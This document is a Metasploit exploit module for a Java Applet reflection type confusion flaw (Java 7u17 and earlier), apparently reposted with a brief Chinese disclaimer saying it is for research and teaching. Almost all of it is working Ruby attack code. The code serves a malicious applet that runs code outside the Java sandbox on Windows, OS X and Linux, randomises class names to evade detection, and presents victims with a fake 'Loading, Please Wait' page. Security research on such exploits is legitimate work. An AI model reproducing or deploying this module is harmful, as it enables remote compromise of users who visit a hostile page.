Java Applet Reflection Type Confusion Remote Code Execution

测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require'msf/core'
require'rex'
classMetasploit3<Msf::Exploit::Remote
Rank=ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({:javascript =>false})
def initialize( info ={})
super( update_info( info,
'Name'=>'Java Applet Reflection Type Confusion Remote Code Execution',
'Description'=>%q{
Thismodule abuses JavaReflection to generate a TypeConfusion, due to a weak
access control when setting final fields on static classes,and run code outside of
the JavaSandbox.The vulnerability affects Java version 7u17and earlier.This
exploit doesn't bypass click-to-play, so the user must accept the java warning in
order to run the malicious applet.
},
'License' => MSF_LICENSE,
'Author' =>
[
'JeroenFrijters', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
['URL','http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html']
],
'Platform'=>['java','win','osx','linux'],
'Payload'=>{'Space'=>20480,'BadChars'=>'','DisableNops'=>true},
'Targets'=>
[
['Generic (Java Payload)',
{
'Platform'=>['java'],
'Arch'=> ARCH_JAVA,
}
],
['Windows x86 (Native Payload)',
{
'Platform'=>'win',
'Arch'=> ARCH_X86,
}
],
['Mac OS X x86 (Native Payload)',
{
'Platform'=>'osx',
'Arch'=> ARCH_X86,
}
],
['Linux x86 (Native Payload)',
{
'Platform'=>'linux',
'Arch'=> ARCH_X86,
}
],
],
'DefaultTarget'=>0,
'DisclosureDate'=>'Jan 10 2013'
))
end
def setup
path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","Exploit.class")
@exploit_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","Union1.class")
@union1_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","Union2.class")
@union2_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
path =File.join(Msf::Config.install_root,"data","exploits","jre7u17","SystemClass.class")
@system_class=File.open(path,"rb"){|fd| fd.read(fd.stat.size)}
@exploit_class_name= rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit",@exploit_class_name)
super
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when/\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@exploit_class_name}.class",@exploit_class)
jar.add_file("Union1.class",@union1_class)
jar.add_file("Union2.class",@union2_class)
jar.add_file("SystemClass.class",@system_class)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each {|entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
jar.build_manifest
send_response(cli, jar,{'Content-Type'=>"application/octet-stream"})
when/\/$/
payload = regenerate_payload(cli)
ifnot payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html,{'Content-Type'=>'text/html'})
else
send_redirect(cli, get_resource()+'/','')
end
end
def generate_html
html =%Q|<html><head><title>Loading,PleaseWait...</title></head>|
html +=%Q|<body><center><p>Loading,PleaseWait...</p></center>|
html +=%Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
html +=%Q|</applet></body></html>|
return html
end
end